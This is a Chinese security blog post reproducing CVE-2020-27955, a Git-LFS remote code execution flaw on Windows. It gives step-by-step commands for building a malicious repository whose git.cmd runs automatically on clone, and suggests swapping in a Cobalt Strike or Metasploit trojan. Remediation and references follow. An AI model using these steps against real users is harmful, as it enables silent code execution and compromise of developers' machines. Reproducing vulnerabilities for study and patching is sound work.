CVE-2020-27955 Git-LFS远程代码执行漏洞复现

admin

101107
文章

87
评论

2021年5月11日01:00:50评论151 views字数 1479阅读4分55秒阅读模式

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。

请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 漏洞简介

Git LFS是Github开发的一个Git扩展，用于实现Git对大文件的支持。Windows平台上的Git-LFS版本<= 2.12上发现远程代码执行问题，一旦受害者克隆了恶意存储库并在其系统上运行了易受攻击的Git-LFS版本，就会立即执行有效载荷，漏洞编号为CVE-2020-27955。

0x02 影响版本

Git<=2.29.2、Git-LFS<=2.12，一些受影响的产品包括Git，GitHub CLI，GitHub Desktop，Visual Studio，GitKraden，SmartGit，Sourcetree等

0x03 漏洞复现

下载并安装≤2.12版本Git-LFS，可通过以下链接安装Windows版Git v2.29.2，Git-LFS版本就是2.12。

https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1

git --versiongit-lfs --version

我们先创建一个名为POC的恶意存储库，然后再依次执行以下命令即可，恶意文件名必须命名为git.bat/git.cmd/git.vbs/git.exe。

安装Git-LFS：

sudo apt-get install git-lfs

git clone https://github.com/3had0w/POC.gitecho calc.exe > git.cmdgit lfs track "*.dat"echo "Junk" > large.datgit add -Agit commit -m "POC"git push -u origin master -f

其他更多Windows可执行文件可在环境变量PATHEXT中查看。

完成以上操作后我们的恶意存储库就创建好了，当有人使用git clone克隆该项目时，git.cmd恶意文件就会被下载到本地，并由Git-LFS扩展自动执行，无需交互，执行流程如下图。

如果需要上线至CS/MSF时可以将恶意存储库中的git.cmd恶意文件替换为CS/MSF的二进制木马文件即可，不过还是得命名为git.exe，接着我们重新执行一下git clone就能够正常上线了。

CVE-2020-27955 Git-LFS远程代码执行漏洞复现

0x04 漏洞修复

更新并保持Git版本高于2.29.2和Git-LFS扩展高于2.12

0x05 参考链接

https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955

https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html

https://infosecwriteups.com/git-lfs-exploit-for-remote-code-execution-cve-2020-27955-e8f4786163c3

关注公众号回复“9527”可免费获取一套HTB靶场文档和视频，“1120”安全参考等安全杂志PDF电子版，“1208”个人常用高效爆破字典，“0221”2020年酒仙桥文章打包，还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

欢迎私下骚扰

本文始发于微信公众号（贝塔安全实验室）：CVE-2020-27955 Git-LFS远程代码执行漏洞复现

左青龙
微信扫一扫

右白虎
微信扫一扫

CVE-2020-27955 Git-LFS远程代码执行漏洞复现

攻防|不太常见的Windows本地提权方法一览

漏洞探索/挖掘绕过双因素身份验证

实战环境中的Redis 延时注入

【2024挖矿应急实战】记录一次HW前夕的挖矿病毒应急实战

引入弹性架构，到底是为什么？

一个IP Getshell

渗透测试实战分享

如何将DOM XSS升级为一键帐户接管（上集）

2024年网络威胁概览（05）| 供应链安全：漏洞的连锁反应

xx集团存在弱口令、sql注入、内网突破

发表评论

在线咨询

微信